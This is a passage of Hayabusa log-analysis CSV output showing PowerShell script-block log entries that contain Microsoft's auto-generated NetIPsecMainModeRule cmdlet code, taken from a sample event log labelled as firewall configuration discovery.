[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
